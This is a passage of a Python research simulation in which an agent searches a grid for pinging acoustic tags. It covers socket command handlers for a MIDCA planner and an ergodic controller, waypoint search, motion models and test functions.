                xll = (int(cmd[1]) - 1) * factor * 2
                yll = (int(cmd[2]) - 1) * factor * 2
                pos = agent.getPos()
                bin = E.getAbstractPos(pos[0], pos[1]) - 1
                unique = []
                count = [0, 0, 0, 0]
                time = [[], [], [], []]
                measured_data = [[], [], [], []]
                total_count = 0
                for data in allMeasurementData:  # tag ID,time,agent pos,bin
                    if (data[3] == bin) and (not data[2] in unique):
                        #print (data)
                        total_count += 1
                        unique.append(data[2])
                        # north
                        if data[2][1] > (yll + (factor * 1.50)):
                            count[0] += data[0]
                            measured_data[0].append(data[0])
                            time[0].append(data[1])
                            # print ("north")
                        # south
                        if data[2][1] < (yll + (factor *.50)):
                            count[1] += data[0]
                            measured_data[1].append(data[0])
                            time[1].append(data[1])
                            # print ("south")
                        # east
                        if data[2][0] > (xll + (factor *1.50)):
                            count[2] += data[0]
                            measured_data[2].append(data[0])
                            time[2].append(data[1])
                            # print ("east")
                        # west
                        if data[2][0] < (xll + (factor *.50)):
                            count[3] += data[0]
                            measured_data[3].append(data[0])
                            time[3].append(data[1])
                            # print ("west")
                #print ("time: ")
                #print (time)
                #print ("Measured_data : ")
                #print (measured_data)
                result = []
                # north
                avg_rate = find_max_7_values_avg_measurement(time[0], measured_data[0])
                #print ("Average value")
                #print (avg_rate)
                result.append(avg_rate)
                # south
                avg_rate = find_max_7_values_avg_measurement(time[1], measured_data[1])
                #print ("Average value")
                #print (avg_rate)
                result.append(avg_rate)
                # east
                avg_rate = find_max_7_values_avg_measurement(time[2], measured_data[2])
                #print ("Average value")
                #print (avg_rate)
                result.append(avg_rate)
                # west
                avg_rate = find_max_7_values_avg_measurement(time[3], measured_data[3])
                #print ("Average value")
                #print (avg_rate)
                result.append(avg_rate)
                # reply: "north,south,east,west"
                data_to_be_sent = ",".join(str(i) for i in result)
                clientsocket.send(str.encode(data_to_be_sent))
            if cmd[0] == 'get_tags_adjacent':
                # per-direction averages of peak detection rates near the
                # edges of the agent's current cell
                agent = agentList[0]
                factor = 2
                xll = (int(cmd[1]) - 1) * factor * 2
                yll = (int(cmd[2]) - 1) * factor * 2
                pos = agent.getPos()
                bin = E.getAbstractPos(pos[0], pos[1])
                probability = []
                unique = []
                count = [0, 0, 0, 0]
                time = [[], [], [], []]
                total_count = 0
                for data in allDetectionData:#tag ID,time,agent pos,bin
                    if (data[3] == bin) and (not data[0] in unique):
                        total_count += 1
                        unique.append(data[0])
                        # north
                        if data[2][1] > (yll + (factor * 1.50)):
                            count[0] += 1
                            time[0].append(data[1])
                            # print ("north")
                        # south
                        if data[2][1] < (yll + (factor * .50)):
                            count[1] += 1
                            time[1].append(data[1])
                            # print ("south")
                        # east
                        if data[2][0] > (xll + (factor * 1.50)):
                            count[2] += 1
                            time[2].append(data[1])
                            # print ("east")
                        # west
                        if data[2][0] < (xll + (factor * .50)):
                            count[3] += 1
                            time[3].append(data[1])
                            # print ("west")
                print (time)
                print (count)
                result = []
                # north
                avg_rate = find_max_5_values_avg(time[0])
                #print ("Average value")
                #print (avg_rate)
                result.append(avg_rate)
                # south
                avg_rate = find_max_5_values_avg(time[1])
                #print ("Average value")
                #print (avg_rate)
                result.append(avg_rate)
                # east
                avg_rate = find_max_5_values_avg(time[2])
                #print ("Average value")
                #print (avg_rate)
                result.append(avg_rate)
                # west
                avg_rate = find_max_5_values_avg(time[3])
                #print ("Average value")
                #print (avg_rate)
                result.append(avg_rate)
                data_to_be_sent = ",".join(str(i) for i in result)
                #print ("The data is : ")
                #print (data_to_be_sent)
                clientsocket.send(str.encode(data_to_be_sent))
                """
                #south
                avg_rate = find_max_5_values_avg(time[1])
                result.append(poisson_rate(avg_rate, 0.8))
                #east
                avg_rate = find_max_5_values_avg(time[2])
                result.append(poisson_rate(avg_rate, 0.8))
                #west
                avg_rate = find_max_5_values_avg(time[3])
                result.append(poisson_rate(avg_rate, 0.8))
                data_to_be_sent = ",".join(str(result))
                clientsocket.send(str.encode(data_to_be_sent))

                # calculate time
                for i,each in enumerate(time):
                        each.sort()
                        counted_times = sum([times-each[0] for times in each])
                        time[i] = counted_times

                print (time)
                print (count)
                result = []
                # calculate poison for north
                if time[0] and count[0]:
                        rate = count[0]/time[0]
                        p = math.exp(-rate)
                        for i in xrange(total_count):
                                p *= rate
                                p /= i + 1
                        result.append(p)
                else:
                        result.append(0.0)

                # calculate poison for south
                if time[1] and count[1]:
                        rate = count[1]/time[1]
                        p = math.exp(-rate)
                        for i in xrange(total_count):
                                p *= rate
                                p /= i + 1
                        result.append(p)
                else:
                        result.append(0.0)

                # calculate poison for east
                if time[2] and count[2]:
                        rate = count[2]/time[2]
                        p = math.exp(-rate)
                        for i in xrange(total_count):
                                p *= rate
                                p /= i + 1
                        result.append(p)
                else:
                        result.append(0.0)

                # calculate poison for west
                if time[3] and count[3]:
                        rate = count[3]/time[3]
                        p = math.exp(-rate)
                        for i in xrange(total_count):
                                p *= rate
                                p /= i + 1
                        result.append(p)
                else:
                        result.append(0.0)
                print (result)
                data_to_be_sent = ",".join(str(result))
                clientsocket.send(str.encode(data_to_be_sent))
                """
            if cmd[0] == 'get_tags_adjacent_new':
                # same directional bucketing as above, but reply with the
                # raw per-direction counts instead of averaged rates
                agent = agentList[0]
                factor = 2
                xll = (int(cmd[1]) - 1) * factor * 2
                yll = (int(cmd[2]) - 1) * factor * 2
                pos = agent.getPos()
                bin = E.getAbstractPos(pos[0], pos[1])
                probability = []
                unique = []
                count = [0, 0, 0, 0]
                time = [[], [], [], []]
                total_count = 0
                for data in allDetectionData:  # tag ID,time,agent pos,bin
                    if (data[3] == bin) and (not data[0] in unique):
                        total_count += 1
                        unique.append(data[0])
                        # north
                        if data[2][1] > (yll + (factor * 1.50)):
                            count[0] += 1
                            time[0].append(data[1])
                            # print ("north")
                        # south
                        if data[2][1] < (yll + (factor * .50)):
                            count[1] += 1
                            time[1].append(data[1])
                            # print ("south")
                        # east
                        if data[2][0] > (xll + (factor * 1.50)):
                            count[2] += 1
                            time[2].append(data[1])
                            # print ("east")
                        # west
                        if data[2][0] < (xll + (factor * .50)):
                            count[3] += 1
                            time[3].append(data[1])
                            # print ("west")
                print (count)
                data_to_be_sent = ",".join(str(i) for i in count)
                # print ("The data is : ")
                # print (data_to_be_sent)
                clientsocket.send(str.encode(data_to_be_sent))
            if cmd[0] == 'cell_lambda':
                # report the agent's belief-map rate for a cell (its own
                # cell when no coordinates were given)
                agent = agentList[0]
                if len(cmd) < 2:
                    pos = agent.getPos()
                    bin = E.getAbstractPos(pos[0], pos[1]) - 1
                    clientsocket.send(str.encode(str(agent.belief_map[bin])))
                else:
                    #bin = E.getAbstractPos(int(cmd[1]), int(cmd[2])) - 1
                    bin = 5 * (int(cmd[1]) - 1) + (int(cmd[2])) - 1
                    clientsocket.send(str.encode(str(agent.belief_map[bin])))
                det_count[0] = 0
            clientsocket.close()#syncVar=True
        except Exception as e:
            traceback.print_exc()
            print(e)
    print("ending")
    clientsocket.close()
def ErgodicComLink():
    """Stream double-integrator agent state to an external ergodic
    controller over the module-level socket and apply the control it
    returns.

    Each cycle sends "x y vx vy t meas" (positions normalized by x_range;
    measurement is the literal string "None" unless updateGP is set) and
    reads back a comma-separated control (u1, u2) into the global u.
    Out-of-bounds agents are overridden with a clipped heading back toward
    the field center.  A send failure ends the loop and jumps t to simtime.
    """
    global u, run, updateGP,t
    run=True
    # handshake: tell the controller the field size
    sock.send(str.encode(str(x_range)))
    while run:
        agent=agentList[0]
        st=agent.state
        bin=E.getAbstractPos(st[0],st[1])-1
        try:
            if not updateGP:
                sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(st[2])+" "+str(st[3])+" "+str(t)+" "+"None "))
            else:
                # a fresh measurement is pending: include it once, then clear
                updateGP=False
                sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(st[2])+" "+str(st[3])+" "+str(t)+" "+str(latestMeas)))
        except:
            run=False
            t=simtime
        data = sock.recv(1024)
        data = data.decode('utf-8')
        cmd=data.split(',')
        if len(cmd)>1:
            u=(float(cmd[0]),float(cmd[1]))
        if st[0]>x_range or st[0]<0 or st[1]<0 or st[1]>y_range:
            # out of bounds: steer back toward the field center instead
            _,utemp=wp_track(agent.getPos(),np.array([x_range/2,y_range/2]))
            u=np.clip(np.array([np.cos(utemp), np.sin(utemp)]),-0.1,0.1)
        #print(st,u)
        print(t,round(st[0],1),round(st[1],1),round(st[2],3),round(st[3],3),u)
        # NOTE(review): syncVar below is a dead local assignment -- it is not
        # declared global, so it has no effect outside this function.
        syncVar=True
def ErgodicComLink2():
    """Single-integrator variant of ErgodicComLink: streams only position
    and time (no velocities) to the external ergodic controller and applies
    the returned control to the global u.

    Sends "x y t meas" with positions normalized by x_range; the
    measurement field is the literal "None" unless updateGP is set.
    Out-of-bounds agents are overridden with a clipped heading toward the
    field center.  A send failure ends the loop and jumps t to simtime.
    """
    global u, run, updateGP,t
    run=True
    # handshake: tell the controller the field size
    sock.send(str.encode(str(x_range)))
    while run:
        syncVar=False
        agent=agentList[0]
        st=agent.state
        bin=E.getAbstractPos(st[0],st[1])-1
        try:
            if not updateGP:
                sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+"None "))
            else:
                # a fresh measurement is pending: include it once, then clear
                updateGP=False
                sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+str(latestMeas)))
        except:
            run=False
            t=simtime
        data = sock.recv(1024)
        data = data.decode('utf-8')
        cmd=data.split(',')
        if len(cmd)>1:
            u=(float(cmd[0]),float(cmd[1]))
        if st[0]>x_range or st[0]<0 or st[1]<0 or st[1]>y_range:
            # out of bounds: steer back toward the field center instead
            _,utemp=wp_track(agent.getPos(),np.array([x_range/2,y_range/2]))
            u=np.clip(np.array([np.cos(utemp), np.sin(utemp)]),-0.1,0.1)
        #print(st,u)
        print(t,round(st[0],1),round(st[1],1),u)
def doubleIntegratorErgodicControl(agent,update):
    """One control exchange with the external ergodic controller for a
    double-integrator agent: send state, receive and return a control.

    Sends "x y vx vy t meas" (positions normalized by x_range; measurement
    is the literal "None" unless *update* is truthy), then parses the reply
    into a (u1, u2) tuple.  A send failure sets run=False, jumps t to
    simtime, and returns None.

    NOTE(review): if the reply has fewer than two fields and the agent is
    in bounds, u is never assigned and the final 'return u' raises
    NameError -- confirm the controller always replies with two values.
    """
    global run,t
    st=agent.state
    try:
        if not update:
            sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(st[2])+" "+str(st[3])+" "+str(t)+" "+"None "))
        else:
            sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(st[2])+" "+str(st[3])+" "+str(t)+" "+str(latestMeas)))
    except:
        run=False
        t=simtime
        return
    data = sock.recv(1024)
    data = data.decode('utf-8')
    cmd=data.split(',')
    if len(cmd)>1:
        u=(float(cmd[0]),float(cmd[1]))
    if st[0]>x_range or st[0]<0 or st[1]<0 or st[1]>y_range:
        # out of bounds: override with a clipped heading toward the center
        _,utemp=wp_track(agent.getPos(),np.array([x_range/2,y_range/2]))
        u=np.clip(np.array([np.cos(utemp), np.sin(utemp)]),-0.1,0.1)
    return u
def singleIntegratorErgodicControl(agent,update):
    """One control exchange with the external ergodic controller for a
    single-integrator agent: send position/time, receive and return a
    control.

    Sends "x y t meas" (positions normalized by x_range; measurement is
    the literal "None" unless *update* is truthy), then parses the reply
    into a (u1, u2) tuple.  A send failure sets run=False, jumps t to
    simtime, and returns None.

    NOTE(review): if the reply has fewer than two fields and the agent is
    in bounds, u is never assigned and the final 'return u' raises
    NameError -- confirm the controller always replies with two values.
    """
    global run,t
    st=agent.state
    try:
        if not update:
            sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+"None "))
        else:
            sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+str(latestMeas)))
    except:
        run=False
        t=simtime
        return
    data = sock.recv(1024)
    data = data.decode('utf-8')
    cmd=data.split(',')
    if len(cmd)>1:
        u=(float(cmd[0]),float(cmd[1]))
    if st[0]>x_range or st[0]<0 or st[1]<0 or st[1]>y_range:
        # out of bounds: override with a clipped heading toward the center
        _,utemp=wp_track(agent.getPos(),np.array([x_range/2,y_range/2]))
        u=np.clip(np.array([np.cos(utemp), np.sin(utemp)]),-0.1,0.1)
    return u
def MidcaIntegrator(agent,update):
    """Service a single MIDCA command from the module-level socket, called
    once per simulation step with the active agent.

    Accepts one client connection, reads one comma-separated command, and
    dispatches it: movement commands rewrite the shared wp_list; query
    commands answer from the accumulated detection/measurement logs.  The
    *update* flag marks a pending measurement, but both send branches are
    currently stubbed out with 'pass'.
    """
    global running, searchComplete, wp_list, E, det_count, agentList, run, t
    run = True
    st= agent.state
    try:
        if not update:
            #sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+"None "))
            pass
        else:
            pass
            #sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+str(latestMeas)))
    except:
        run=False
        t=simtime
        return
    # accept connections from outside
    (clientsocket, address) = sock.accept()
    data = clientsocket.recv(1024)
    data = data.decode('utf-8')
    cmd=data.split(',')
    #print(cmd)
    if cmd[0] == 'quit':
        running = False
        run = False
        # NOTE(review): endSim is not in the global statement above, so this
        # binds a local and the module-level endSim flag is never set.
        endSim = True
    elif cmd[0] == 'start':
        running = True
    elif cmd[0] == 'moveTo':
        # cell indices arrive 1-based; steer to that cell's center
        x = int(cmd[1]) - 1
        y = int(cmd[2]) - 1
        center = np.array([x * x_range / 5.0, y * y_range / 5.0]) + np.array(
            [.5 * x_range / 5.0, .5 * y_range / 5.0])
        wp_list[0] = [center]
    elif cmd[0] == 'moveToPhysicalPosition':
        x = int(cmd[1]) - 1
        y = int(cmd[2]) - 1
        center = np.array([x, y])
        wp_list[0] = [center]
    elif cmd[0] == 'inCell':
        # reply whether agent 0 currently occupies cell (x, y)
        agent = agentList[0]
        pos = agent.getPos()
        bin = E.getAbstractPos(pos[0], pos[1])
        x = int(cmd[1])
        y = int(cmd[2])
        myx, myy = E.getCellXY(pos[0], pos[1])
        bin2 = 5 * (y - 1) + (x - 1)
        clientsocket.send(str.encode(str(x == myx and y == myy)))
        # print(bin, bin2)
    elif cmd[0] == 'time':
        # current simulation time
        clientsocket.send(str.encode(str(t)))
    elif cmd[0] == 'getCell':
        agent = agentList[0]
        pos = agent.getPos()
        bin = E.getAbstractPos(pos[0], pos[1])
        myx, myy = E.getCellXY(pos[0], pos[1])
        clientsocket.send(str.encode(str(myx) + "," + str(myy)))
    elif cmd[0] == 'search':
        # queue a waypoint search pattern around the requested cell
        x = int(cmd[1]) - 1
        y = int(cmd[2]) - 1
        center = np.array([x * x_range / 5.0, y * y_range / 5.0]) + np.array(
            [.5 * x_range / 5.0, .5 * y_range / 5.0])
        wp_list[0] = search(wp_list[0], center)
        searchComplete = False
    elif cmd[0] == 'searchComplete':
        clientsocket.send(str.encode(str(searchComplete)))
    elif cmd[0] == 'get_tags':
        # count unique tag IDs detected in the requested cell
        agent = agentList[0]
        bin = 5 * (int(cmd[2]) - 1) + (int(cmd[1]))
        # print (bin)
        count = 0
        unique = []
        for data in allDetectionData:
            if (data[3] == bin) and (not data[0] in unique):
                count = count + 1
                unique.append(data[0])
        clientsocket.send(str.encode(str(count)))
    elif cmd[0] == 'get_measurement':
        # sum the measurements logged at unique positions in the cell
        # allMeasurementData.append([latestMeas, [pos[0], pos[1]], bin])
        # latestMeas, [pos0, pos1], bin
        bin = 5 * (int(cmd[2]) - 1) + (int(cmd[1])) - 1
        print (bin)
        sum = 0
        unique = []
        for data in allMeasurementData:
            if (data[3] == bin) and (not data[2] in unique):
                sum += data[0]
                unique.append(data[2])
        clientsocket.send(str.encode(str(sum)))
    elif cmd[0] == "get_adjacent_measurement":
        # per-direction (N, S, E, W) averages of measurement values logged
        # near the edges of the agent's current cell
        agent = agentList[0]
        factor = 2
        xll = (int(cmd[1]) - 1) * factor * 2
        yll = (int(cmd[2]) - 1) * factor * 2
        pos = agent.getPos()
        bin = E.getAbstractPos(pos[0], pos[1]) - 1
        unique = []
        count = [0, 0, 0, 0]
        time = [[], [], [], []]
        measured_data = [[], [], [], []]
        total_count = 0
        for data in allMeasurementData:  # tag ID,time,agent pos,bin
            if (data[3] == bin) and (not data[2] in unique):
                # print (data)
                total_count += 1
                unique.append(data[2])
                # north
                if data[2][1] > (yll + (factor * 1.50)):
                    count[0] += data[0]
                    measured_data[0].append(data[0])
                    time[0].append(data[1])
                    # print ("north")
                # south
                if data[2][1] < (yll + (factor * .50)):
                    count[1] += data[0]
                    measured_data[1].append(data[0])
                    time[1].append(data[1])
                    # print ("south")
                # east
                if data[2][0] > (xll + (factor * 1.50)):
                    count[2] += data[0]
                    measured_data[2].append(data[0])
                    time[2].append(data[1])
                    # print ("east")
                # west
                if data[2][0] < (xll + (factor * .50)):
                    count[3] += data[0]
                    measured_data[3].append(data[0])
                    time[3].append(data[1])
                    # print ("west")
        # print ("time: ")
        # print (time)
        # print ("Measured_data : ")
        # print (measured_data)
        result = []
        # north
        avg_rate = find_max_7_values_avg_measurement(time[0], measured_data[0])
        # print ("Average value")
        # print (avg_rate)
        result.append(avg_rate)
        # south
        avg_rate = find_max_7_values_avg_measurement(time[1], measured_data[1])
        # print ("Average value")
        # print (avg_rate)
        result.append(avg_rate)
        # east
        avg_rate = find_max_7_values_avg_measurement(time[2], measured_data[2])
        # print ("Average value")
        # print (avg_rate)
        result.append(avg_rate)
        # west
        avg_rate = find_max_7_values_avg_measurement(time[3], measured_data[3])
        # print ("Average value")
        # print (avg_rate)
        result.append(avg_rate)
        # reply: "north,south,east,west"
        data_to_be_sent = ",".join(str(i) for i in result)
        clientsocket.send(str.encode(data_to_be_sent))
    elif cmd[0] == 'get_tags_adjacent':
        # per-direction averages of peak detection rates near the edges of
        # the agent's current cell
        agent = agentList[0]
        factor = 2
        xll = (int(cmd[1]) - 1) * factor * 2
        yll = (int(cmd[2]) - 1) * factor * 2
        pos = agent.getPos()
        bin = E.getAbstractPos(pos[0], pos[1])
        probability = []
        unique = []
        count = [0, 0, 0, 0]
        time = [[], [], [], []]
        total_count = 0
        for data in allDetectionData:  # tag ID,time,agent pos,bin
            if (data[3] == bin) and (not data[0] in unique):
                total_count += 1
                unique.append(data[0])
                # north
                if data[2][1] > (yll + (factor * 1.50)):
                    count[0] += 1
                    time[0].append(data[1])
                    # print ("north")
                # south
                if data[2][1] < (yll + (factor * .50)):
                    count[1] += 1
                    time[1].append(data[1])
                    # print ("south")
                # east
                if data[2][0] > (xll + (factor * 1.50)):
                    count[2] += 1
                    time[2].append(data[1])
                    # print ("east")
                # west
                if data[2][0] < (xll + (factor * .50)):
                    count[3] += 1
                    time[3].append(data[1])
                    # print ("west")
        print (time)
        print (count)
        result = []
        # north
        avg_rate = find_max_5_values_avg(time[0])
        # print ("Average value")
        # print (avg_rate)
        result.append(avg_rate)
        # south
        avg_rate = find_max_5_values_avg(time[1])
        # print ("Average value")
        # print (avg_rate)
        result.append(avg_rate)
        # east
        avg_rate = find_max_5_values_avg(time[2])
        # print ("Average value")
        # print (avg_rate)
        result.append(avg_rate)
        # west
        avg_rate = find_max_5_values_avg(time[3])
        # print ("Average value")
        # print (avg_rate)
        result.append(avg_rate)
        data_to_be_sent = ",".join(str(i) for i in result)
        # print ("The data is : ")
        # print (data_to_be_sent)
        clientsocket.send(str.encode(data_to_be_sent))
    elif cmd[0] == 'get_tags_adjacent_new':
        # same directional bucketing as above, but reply with the raw
        # per-direction counts instead of averaged rates
        agent = agentList[0]
        factor = 2
        xll = (int(cmd[1]) - 1) * factor * 2
        yll = (int(cmd[2]) - 1) * factor * 2
        pos = agent.getPos()
        bin = E.getAbstractPos(pos[0], pos[1])
        probability = []
        unique = []
        count = [0, 0, 0, 0]
        time = [[], [], [], []]
        total_count = 0
        for data in allDetectionData:  # tag ID,time,agent pos,bin
            if (data[3] == bin) and (not data[0] in unique):
                total_count += 1
                unique.append(data[0])
                # north
                if data[2][1] > (yll + (factor * 1.50)):
                    count[0] += 1
                    time[0].append(data[1])
                    # print ("north")
                # south
                if data[2][1] < (yll + (factor * .50)):
                    count[1] += 1
                    time[1].append(data[1])
                    # print ("south")
                # east
                if data[2][0] > (xll + (factor * 1.50)):
                    count[2] += 1
                    time[2].append(data[1])
                    # print ("east")
                # west
                if data[2][0] < (xll + (factor * .50)):
                    count[3] += 1
                    time[3].append(data[1])
                    # print ("west")
        print (count)
        data_to_be_sent = ",".join(str(i) for i in count)
        # print ("The data is : ")
        # print (data_to_be_sent)
        clientsocket.send(str.encode(data_to_be_sent))
    elif cmd[0] == 'cell_lambda':
        # report the agent's belief-map rate for a cell (its own cell when
        # no coordinates were given)
        agent = agentList[0]
        if len(cmd) < 2:
            pos = agent.getPos()
            bin = E.getAbstractPos(pos[0], pos[1]) - 1
            clientsocket.send(str.encode(str(agent.belief_map[bin])))
        else:
            # bin = E.getAbstractPos(int(cmd[1]), int(cmd[2])) - 1
            bin = 5 * (int(cmd[1]) - 1) + (int(cmd[2])) - 1
            clientsocket.send(str.encode(str(agent.belief_map[bin])))
        det_count[0] = 0
    clientsocket.close()
    # NOTE(review): split(',') always yields at least one element, so this
    # condition is always true and the return is unconditional.
    if len(cmd)>=1:
        return
'''
pseudo code
create grid world
generate tag positions based on probability map and total number of fish N
create agents
simulation:
1. detect tags
2. update tag.lastPing
3. update agent dynamics
'''
def draw(x):
    """Scatter-plot tag positions on figure 1.

    Parameters
    ----------
    x : tuple
        ``(xs, ys)`` arrays of tag coordinates, drawn as red dots.
    """
    xs, ys = x[0], x[1]
    plt.figure(1)
    plt.axis('scaled')
    plt.grid(True)
    plt.plot(xs, ys, 'r.')
    plt.xlim([0, E.x_range])
    plt.ylim([0, E.y_range])
    # one tick per abstract grid cell (5x5 world)
    tick_dx = E.x_range / 5.0
    tick_dy = E.y_range / 5.0
    plt.xticks(np.arange(0, E.x_range, tick_dx))
    plt.yticks(np.arange(0, E.y_range, tick_dy))
    plt.draw()
def drawAgent(x,r=None):
    """Plot agent position(s) as blue dots on figure 1.

    Parameters
    ----------
    x : tuple
        ``(xs, ys)`` coordinates of the agent(s).
    r : float, optional
        Sensor radius; when given, an unfilled blue circle of radius ``r``
        centred on the agent position is drawn as well.
    """
    plt.figure(1)
    plt.axis('scaled')
    plt.grid(True)
    plt.plot(x[0], x[1], 'bo')
    # fixed: compare to None with identity, not equality (was ``r==None``)
    if r is not None:
        circ=plt.Circle((x[0], x[1]), r, color='b', fill=False)
        plt.gcf().gca().add_artist(circ)
    plt.xlim([0, E.x_range])
    plt.ylim([0, E.y_range])
    # one tick per abstract grid cell (5x5 world)
    plt.xticks(np.arange(0,E.x_range,E.x_range/5.0))
    plt.yticks(np.arange(0,E.y_range,E.y_range/5.0))
    plt.draw()
def iterative_average(x, n, ave):
    """Fold a new sample into a running mean.

    Parameters
    ----------
    x : float
        New sample value.
    n : int
        Number of samples already folded into ``ave``.
    ave : float
        Current running mean over those ``n`` samples.

    Returns
    -------
    float
        The running mean over ``n + 1`` samples.
    """
    delta = x - ave
    return ave + delta / (n + 1)
def simulate_dynamics(agent,u,tspan,dt):
    # Forward-integrate the agent's dynamics with fixed-step Euler over
    # tspan=[t0, t1] using step dt, holding the control input u constant.
    # Returns the integrated state.
    # NOTE(review): ``inc`` aliases ``agent.state`` (no copy is taken), so the
    # in-place ``+=`` below mutates agent.state directly as a side effect —
    # presumably intentional, but confirm callers rely on this.
    inc = agent.state
    for i in np.linspace(tspan[0],tspan[1],int((tspan[1]-tspan[0])/dt)):
        inc+=agent.dynamics(inc,u)*dt#+world.flow(agent.getPos())*dt
    return inc
def f1_plan(x0, x, N):
    """Greedy heading plan from start ``x0`` toward goal ``x``.

    Simulates ``N`` unit-heading steps of length 0.005: at each step the
    heading points straight at the goal from the simulated position.

    Returns
    -------
    numpy.ndarray
        Array of ``N`` heading angles (radians).
    """
    headings = np.zeros(N)
    pos = x0.copy()
    for step in range(N):
        err = x - pos
        headings[step] = np.arctan2(err[1], err[0])
        pos += 0.005 * np.array([np.cos(headings[step]), np.sin(headings[step])])
    return headings
def search(wp_list, X):
    """Append a 7-waypoint lawnmower-style sweep of one cell to ``wp_list``.

    The pattern visits the cell centre ``X``, its four corners (offset by
    0.375 of a cell width), revisits the first corner, and returns to the
    centre.  The (mutated) list is also returned for convenience.
    """
    # X is the center position of one of the 25 cells
    off = .375 * x_range / 5
    centre = np.array(X)
    wp_list.append(centre)
    for dx, dy in ((-off, off), (off, off), (off, -off), (-off, -off), (-off, off)):
        wp_list.append(centre + np.array([dx, dy]))
    wp_list.append(np.array(X))
    return wp_list
def wp_track(x, wp_list):
    """Waypoint-tracking controller.

    Computes the heading from position ``x`` toward the first waypoint; when
    that waypoint is reached (within 1/50 of the world width) and more remain,
    it is dropped.  When only one waypoint is left the module-level flag
    ``searchComplete`` is raised.

    Returns
    -------
    tuple
        ``(wp_list, heading)`` — the (possibly shortened) list and the
        heading angle (radians) toward the waypoint that was active on entry.
    """
    global searchComplete
    err = np.array(wp_list[0]) - x
    reached = np.linalg.norm(err) < x_range / 50.0
    if reached and len(wp_list) > 1:
        wp_list.pop(0)
    if len(wp_list) == 1:
        searchComplete = True
    heading = np.arctan2(err[1], err[0])
    return wp_list, heading
######################## motion models ###################################
def m1_step(x,u):
    """Constant-speed heading model: the state ``x`` is ignored and the
    velocity is the unit vector along heading angle ``u`` (radians)."""
    vx = np.cos(u)
    vy = np.sin(u)
    return np.array([vx, vy])
def m2_step(x,u):
    """Damped double-integrator dynamics: ``xdot = A @ x + B @ u``.

    State ``x = [px, py, vx, vy]``, input ``u = [ax, ay]``; both velocity
    axes carry the same linear drag coefficient:

        |0 0  1  0|x    |0 0|
        |0 0  0  1|y  + |0 0|u1
        |0 0 -a  0|vx   |1 0|u2
        |0 0  0 -a|vy   |0 1|
    """
    drag = .25
    A = np.array([[0, 0, 1, 0],
                  [0, 0, 0, 1],
                  [0, 0, -drag, 0],
                  [0, 0, 0, -drag]])
    B = np.array([[0, 0],
                  [0, 0],
                  [1, 0],
                  [0, 1]])
    return A.dot(x) + B.dot(u)
def m3_step(x,u):
    """Saturated single-integrator: each of the two input components is
    clipped to [-1, 1]; the state ``x`` is ignored."""
    clipped = [min(max(c, -1), 1) for c in (u[0], u[1])]
    return np.array(clipped)
############################# test functions ###############################################
def rastrigin(x, y):
    """2-D Rastrigin test function (global minimum 0 at the origin)."""
    two_pi = 2 * np.pi
    quadratic = x ** 2 + y ** 2
    ripple = np.cos(two_pi * x) + np.cos(two_pi * y)
    return 20 + quadratic - 10 * ripple
def rosenbrock(x, y):
    """Modified 2-D Rosenbrock test function with a=10, b=0.001
    (minimum value 0 at ``x = a``, ``y = a**2``)."""
    a = 10
    b = .001
    valley = (y - x ** 2) ** 2
    return b * valley + (a - x) ** 2
def gaussianSum(x, y):
    """Sum of two Gaussian bumps over the world: amplitude 10 centred at
    ``(0.75*x_range, 0.45*y_range)`` and amplitude 15 centred at
    ``(0.3*x_range, 0.7*y_range)``."""
    peak1 = np.array([.75 * x_range, .45 * y_range])
    peak2 = np.array([.3 * x_range, .7 * y_range])
    here = np.array([x, y])
    d1_sq = np.linalg.norm(here - peak1) ** 2
    d2_sq = np.linalg.norm(here - peak2) ** 2
    return 10 * np.exp(-0.05 * d1_sq) + 15 * np.exp(-0.1 * d2_sq)
def tagField(tagData, pos, t, time_step, sensorRange):
    """Vectorised ping/detection model over the whole tag table.

    ``tagData`` columns: 0=last_ping, 1=pos_x, 2=pos_y, 3=pos_z,
    4=ping_delay, 5=tag ID, 6=bin.

    A tag is "pinging" at time ``t`` when the phase of its ping cycle,
    ``fmod(t, delay + eps)``, lies strictly inside the window
    ``(last_ping + delay, last_ping + delay + time_step)``.

    Returns
    -------
    tuple
        ``(pinging_rows, detected_ids, num_detections)`` — the rows of tags
        currently pinging, the IDs of pinging tags within ``sensorRange`` of
        ``pos``, and the detection count.
    """
    agent_xy = np.array([pos[0], pos[1]])
    dists = np.linalg.norm(tagData[:, 1:3] - agent_xy, axis=1)
    eps = time_step / 100.0
    phase = np.fmod(t, tagData[:, 4] + eps)
    ping_start = tagData[:, 0] + tagData[:, 4]
    pinging = np.logical_and(phase - ping_start < time_step, phase > ping_start)
    detected = np.logical_and(dists < sensorRange, pinging)
    ping_rows = tagData[np.where(pinging)[0], :]
    det_ids = tagData[np.where(detected)[0], 5]
    return ping_rows, det_ids, np.sum(detected)
# Hand-authored 5x5 tag-density weights (row-major, one value per grid cell).
# Only consumed via E.setMap(density_map), which is currently commented out in
# the setup below in favour of a pre-generated tag list.
density_map = np.array([0.1, 0.1, 0.4, 0.3, 0.2,
                        0.1, 0.3, 0.3, 0.1, 0.3,
                        0.2, 0.3, 0.3, 0.2, 0.1,
                        0.3, 0.9, 0.3, 0.2, 0.1,
                        0.2, 0.3, 0.2, 0.1, 0.1])
#################################### simulation settings ###################################
N = 1000 #how many tags present
simtime=1000 #max simulation time
numAgents=1 #number of agents exploring
sensorRange=2
x_range=20.0 #grid size
y_range=20.0
spacing=(1,1)#(.5,.5) #spacing between points for visualizing fields
searchMethods = ["MIDCA","SUSD","ERGODIC_DI","DEMO","ERGODIC_SI"]
method = searchMethods[0]
fields= ["tag","gassian sum","rosenbrock","rastrigin"]
#fieldMax = [(5.5,14,1.5),(.3*x_range,.7*y_range,14)]#tag field absolute max 9.5 # for tag_100
